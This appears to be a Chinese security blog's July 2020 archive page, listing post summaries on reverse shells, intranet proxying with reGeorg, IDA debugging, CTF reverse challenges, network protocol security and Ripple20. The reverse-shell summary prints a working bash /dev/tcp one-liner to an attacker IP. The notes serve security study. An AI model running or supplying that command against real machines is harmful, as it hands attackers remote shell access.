2020 年 7月随笔档案 - 歇马

反弹shell学习

摘要：#反弹shell命令解析攻击者在机器上监听相应端口，在受害者机器执行反弹shell命令，然后get shell。 bash -i >&/dev/tcp/192.168.190.138/6666 0>&1 ##bash -i 启动一个交互式shell 交互式shell的意思就是跟用户交互，你输入一行阅读全文

posted @ 2020-07-27 11:23 歇马阅读(178) 评论(0) 推荐(0)

capa规则解析

该文被密码保护。

posted @ 2020-07-24 14:32 歇马阅读(0) 评论(0) 推荐(0)

内网全局代理工具-流量特征

摘要：#Regeorg+Proifier 参考链接https://www.freebuf.com/articles/network/208221.html Windows reGeorg+proxifier 正向代理环境攻击端（Win10）：192.168.223.1 靶机一（Win2008）：外网I 阅读全文

posted @ 2020-07-13 09:51 歇马阅读(2193) 评论(0) 推荐(0)

IDA动态调试

摘要：#环境配置首先打开IDA 7.0\dbgsrv 此路径下为针对不同系统的调试文件，将对应的文件拷贝到要调试的系统中并运行，默认会监听23946端口。起一下调试文件打开IDA　选择Debug->RemoteWindowsDebug #窗口跑了一个简单程序 F5看下伪代码窗口输入123 双击& 阅读全文

posted @ 2020-07-09 14:00 歇马阅读(284) 评论(0) 推荐(0)

TCP/UDP协议安全

摘要：#端口首先要理解端口（port）的概念。端口是一种抽象的软件结构，包括一些数据结构和I/O缓冲。进程通过系统调用与端口建立连接（binding），之后传输层传给该端口的数据都被相应进程所接收，而相应进程发给传输层的数据也通过该端口。端口操作类似于一般的I/O操作，进程获取一个端口，相当于获取本地阅读全文

posted @ 2020-07-07 15:55 歇马阅读(587) 评论(0) 推荐(0)

刷

摘要：#Reverse IDA使用指令链接 ##内涵 0707 直接拖进IDA看到疑似flag，按A可以转中文 A ASCII解析成ASCII ##[BJDCTF 2nd]guessgame 拖进IDA 发现flag ##xor 拖进IDA int __cdecl main(int argc, cons 阅读全文

posted @ 2020-07-07 11:26 歇马阅读(306) 评论(0) 推荐(0)

ICMP协议安全

摘要：#从ICMP协议开始参考链接 https://www.cnblogs.com/bjlhx/p/10985384.html 一个新搭建好的网络，往往需要先进行一个简单的测试，来验证网络是否畅通；但是IP协议并不提供可靠传输。如果丢包了，IP协议并不能通知传输层是否丢包以及丢包的原因。所以我们就需要阅读全文

posted @ 2020-07-03 10:02 歇马阅读(807) 评论(0) 推荐(0)

IP协议安全

摘要：#从IP协议安全开始 ##IP数据包 IP协议 IP包在网络层不保证可靠性数据包可能重复、丢失，是无连接协议首先要看TCP/IP协议，涉及到四层：链路层，网络层，传输层，应用层。其中以太网（Ethernet）的数据帧在链路层 Frame是链路层的基本单元，包含链路层的头部信息（mac地址）和阅读全文

posted @ 2020-07-02 14:43 歇马阅读(858) 评论(0) 推荐(0)

ustc sec

摘要：阅读全文

posted @ 2020-07-01 16:20 歇马阅读(176) 评论(0) 推荐(0)

Ripple20漏洞

摘要：#关于Ripple20 国外安全研究人员在由Treck开发的TCP/IP协议栈中发现了多个漏洞，这一系列漏洞统称为Ripple20。这些漏洞广泛存在于嵌入式和物联网设备中，影响了多个行业领域（包括医疗、运输、能源、电信、工业控制、零售和商业等），涉及了众多供应商（包括HP、Schneider Ele 阅读全文

posted @ 2020-07-01 09:12 歇马阅读(278) 评论(0) 推荐(0)

歇马

07 2020 档案

公告